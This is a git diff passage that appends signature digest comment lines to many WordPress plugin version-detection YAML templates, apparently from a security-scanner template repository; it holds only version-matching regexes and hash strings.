a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..ddc2eb5c0c 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e4b23fdb54e0fafff73e6fdaf93eb263bf10268fe088dd8b93f343ab8f6950b02202814aedfd42a21fde29a86986afd2882314ee5f94d027bc007bed195bcd33705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..3283c2f515 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e7aeb13908dc27242a69d0e3c34d0142988153705f0eeb7b7145c6741f41d24d0220034db17c3dd0a259d1cfef2afd2f7bcb1e5304c0dc883eb3fd88663aefd3b0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..072cea28b9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c8cf9c3869642344fa8647ddd90c1cda6518d59f6e56e81d8d24f444f1985400221009df74bc65d1c242bb05f476191767ec174565a1d227b96d7ba2ff027db1234b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..4696355623 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204885b6f0970c5759536e8096b7c4c59cba7d59b12035fa5990745d567a835021022047977e87324ea38aba9069fcce025f541bab1225bb16524ea19fc9eae1419184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..acf0f4b209 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089027850189f60dc67208d9c1702546fc48eb2219dbaf5e13c32322843b9579f022075835929c5fcb85b1acc893c12aa4e876ff15df639247c36eeb0eea07daee87c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..ff139a1a6d 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220206641482d7e25f32de7dfbbc7daf2ffbd8d463531b9a9862ecf9c8cc38d611f02202b1488922e4049d9a8859ce2be630a5307f8de96109f2758d9d0469fb7ea9b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..c8ab88d297 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022057bb453d005dab6da21fe96f1f1f42277249ecc5d815b9f10af01a54959d7656022100fc5ae83acd470b66de63b24caad40f116c6de5a329a83c69f8517b462822725a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..3792b5079f 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207237b40f025e6393b500bfc8c14c7224f93da7a2e35bef7484050a3509154dee022053d89b5f0cff1f7ccc5647b9b4a51071b8389788c4da77d615bd371b68eaa8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..b35b1fa66b 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ff773836e49a54cfa7c469a4cf829bf8411397ba321d697fc01d923ccec250a02207df9c23140a0bbe44f4574839f0083191cf3ad389e684caf13d71a5be8b98833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..6680ecb50d 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200eefca9b7e78c1f9eecc6bf3bf5b0efce9f4aa99fa94b4b957e208d54e19ec5c022100a9dbeb13454e81a6dd75fe49fa90b9a0b186b5dc0b7abb2a3726731e969095bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..b6028d499a 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9c2b419732d6e611600887f9e2e36e3104d485a7d9bef68a3fa8f5a748c61c702203168566ea43a1da356fbbbd111502cf3bc5ffba0196b601ab9f01f93aa831bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..8c4277172b 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3c0fa218de83618a16d576b616e27bb87ada4b0ede277397d8e76b1f4a9f0ec022100f9671ab3c4d10c39cb0e5ee7727bfb8c439ccc5dba557e2c42b239b962128bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..a378383eea 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b55f8d3ef89cc34df4445c2646cd98619c921e5fd602a3ebc60ae86791b637c90220707c14d1010e5014c09c5efbdd86ea33de8ac2c8b83aa98d9e9c59e9df03f2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..6768a836f4 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d478e8abeac931ff8d8aac2db05bfa16196d03533932bcc1a6bb5b130787687f02210083b1b32fc7e606634d1223b91b532e0dedd2ea97c3d0cb2b528240341a49e5b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..e210732a28 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220110371016162f736c3ead8d489b010f5f335b39a834dbc7d6a72d6395264537e022100fece6a19fe10e8dc1e60f539cb24fd64e1f1427d9197b6ebaff0686a812d6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..6c76461eef 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8e2b1bb384af255a297c31bcfc462ac009d1850ed83870bbde69a94e5b0098e022023fb79e900c90b340a865b275dd50c38ef76404648af291e4a4f866ee71c116d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..bb24640dc6 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d81b7849d4e0d62dd837720b254cd0d90dcb1cb43cdb3e23c5e71400be7c6c4b022100e9437215658a93e2fa983e39da5e31a11327c6e0a404c535ab73d1e49d7c5ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..d3086d9dca 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e26b186435714198cfb17f4c7bae8ba8987d3d1d6967dd688cbcc17c8f716f6022015681d01dcebd5a3ffd14e609ff2993e1e1ce2b68cf26f62784f274bd4c47068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..50ea6b31d8 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029230972098684499d814aa50497456a24f4febdac1be45b4628cc78048091d6022100bed2e83c4e515013edb99168530de25e7bef0e7ad7c1d32d20a5c0b15fe5aa74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..6006f9da3a 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c31e667cac393c3d579df893919216828210e97a9b70a6fa28b40167385d457022100f738c5fbbf4044d682315c60906e3edf4f64bdb557984d5ad426e64410782048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..df33e14c2e 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fda60a0e1400d9921159c06ae2e13a7881dd278e13919cfd76fbb766b9210b32022100a5d057a5ea36ac71720504762825473420a353081ff89a796c34a0d155eb1ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..38d86a1b6d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ece28ec69ace44c0311e2fb04325572ed5f7e5bbd4e8bdb7cef9acfcbe2c72002207c0f9002645e0825c51dec5008f8dad31c1327ba8154219941b207d85bf0a353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..6ef8678158 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090ad05069515a4033e315b4dd22ea725232335ad192400301847ae495099e8140220193bae1e52fd3490193f3b0d0e773c182289351c25184bdf12ab14111fbd423e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..24b2560a8b 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c2c786bcb5b7ede7be9811fd9e55cf2e3877c782274a10f328e2913d4af1a3e022002bf5147f3498062f3a02439d9c66ffdfd90261648e216407c1f27cad7e7dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..606fb5dcba 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f16a75b40c332774b9dc27b9c1f09a8a5c07f03d60680179af4b8324f1eff3802210094af2f228126adf4682359d4ed9caaedb641a767ce533ba35e83044c704dd147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..3946679ef0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d48073559ca6d2bf26ed0feb7515533df5aa6002deee69f518a381d69f828f20220273f1efa467c026b837de742fc6d6754be7fdbe18b1e5795d3a83cbcc35f1684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..7646d558fa 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022042db7265d11e09dbee913869038ba4f9fe9f8464d9679027de51c2993373020902210086c6cea63e1e177b076cdff1acc724194a6a14088a7cc23967741169f7fe48a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..ab5ca59280 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b9617f27fa92115a80ca9da20848fa46c2f25103a9c4a1e22177eb67be757537022100cc9d1454449d6c91da369b3863340a5290a2a34ad57f21810ca3a526017acb10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..421673c096 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d91ce5255534bffd34a5e3239167fe83bf40dcb95fd6245cae0e553dc72296480220758155e1416e0ed73399780ac75aed4292c5ff824171e511f1b0a7c9dc2d6e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..6eb30fd7f0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220601702d04588f07db38e642654716d8f206325c06f58f540397fb5466d4e82a4022100c7c8d997f7da92fc188fdaa2f7d773dd7093f8dd486dd30526a42005bdc26ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..286007c3bd 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220444d8de7d9229f03b7583a950ae74142bf8e6d103c168fb23806bbf201947dfc02204af79aa43c8eba13e8d1af961e9aa5ad03670672c9391b3dad44514332e9d815:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..b6ea3dc6d6 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9a3052ea93ff4b09992a37aec9f17d12057b6b3054339fc40be40cd22feb1b8022100850246f00c3591e52ef195ffd30e225d9168b9bc5b0603b43c19802ba0ae076f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..0a9a24e50e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a17694fbefa81339cfe55d2599e48fc285c895e84f9e301c2dae8772f1480bab02203b947e4f2efd40931324b4ac8531f5d31bc67019328e3b64589ddca81d4dc0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..2fd8370fa3 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2bf210575e9ef8e5c3cc5316b6ffbf7a4d44b4a739dccec315fd9b2e1a6dace02200df31d311349c57915ef7fab039ab301f32e37ee87897ccbf7e2d58701e2e102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..18d8b41a9f 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045bd58a52effec97daac06abcd8aaf5417a7f5cc195480151c0a7c313981f76602206ed679174e66cb83b05144f2bcdd69761f7e82256010e793debbcdf4b4523615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..8825d9958f 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a82d469c129b6769d3356eb953920112aaf18666c7ed801a352d5d89b6dc662022100b61bf1ca727ba8ac0e8c5174eb241ebb47ddb084452fe87656628b742f5aeb50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..afc003f030 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b3d6e307f5cd5b787612f08b322ca31db5a282cd3c25c954fcd117fff8c7de4022100a934ce261578e6b3f91f49b7545b8f3b13b7bb7a937d5daeff7623fc43c83272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..86d18e3587 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100842239fcd3c98018439e7e16e4febc8e717848d3fff21f892e69f3ef4b37717d0220035b71f190d282ccabe8a717703a009c2ae2577853cbd570a3e36f22ea427c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..289213ee86 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073a08da40e218ef34b9d80c7602e8fd39b7d1d921fded1fe5153cfa4a258e03f022100ea6a0400e0097ab647b8b8c2eadc3b25803c6fdf515a2b4e6260d698ca73b4d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..b75eeee595 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019af0547cb289e5dce10c4dd120aed10a15bb9fb7113b3a8143a237251007669022100dfcde75be5c58ea063d2aa446cc8de8b15795645fe22b481142a4afcfee531d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..71e8f542f9 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b43a5f736f62616ef27a4dc5ebaa629a0c4b1150c99a71fbf3eabbd36602f5230221008b701f8bef6cc0fba86820381993ff8399746a0f476cd9dd40e62b69354a2287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..a1681b3928 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d17edb827d5cc588b871f82f57153d053c57d285cc78d1c4314ba91723ec6d2022078390cfa48523f0e35d53a8a2504c9c8d0ed89028a2089c2e982e9464d3dd33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..fb5cde63a6 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201cc9d2b699cf29dd41d2686d80beab3f10424d8205d4040083a8ee02ab3e0170022072878d66f8783d3e8087c4796fbb233034111bae0ebff1c4f3bba0d454a9f4b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..4c6fb0dd10 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054c5aedf0011bfa6e093963ed15c52596becaecb6334e1633672d0d314e4c8410221008136b2df879d9eece952c2516964308670e30b79463610b0603db4b101dc83f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..a580d9e186 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1dfdc5f15d9f1686c0c8c591762ff68a519e0801be7760249c411f5fbaaa6f4022100c23de6ad3a48454bab94a2e7d79cc01d6fc96f38aa7bb0946818d357cdd2d4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..b6830ea822 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d168734ec4618f9f49b38a93033dcebe8f04964ed26902eb0d3ffb6083a2bf7022100c2b070e6db8e783906504a93cca35ae2c0192e47303c6f9886e19bc4025e9446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..c1c35326c5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220495ae15e7df96ece72dfc6cc386b28528af6e9f0064e08900b3aa6921fde10320221009a2cbd9fa83ac9192459b773134792fdf1c305ff3502d9917225a9b0e574a9d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..76f7fb6e81 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 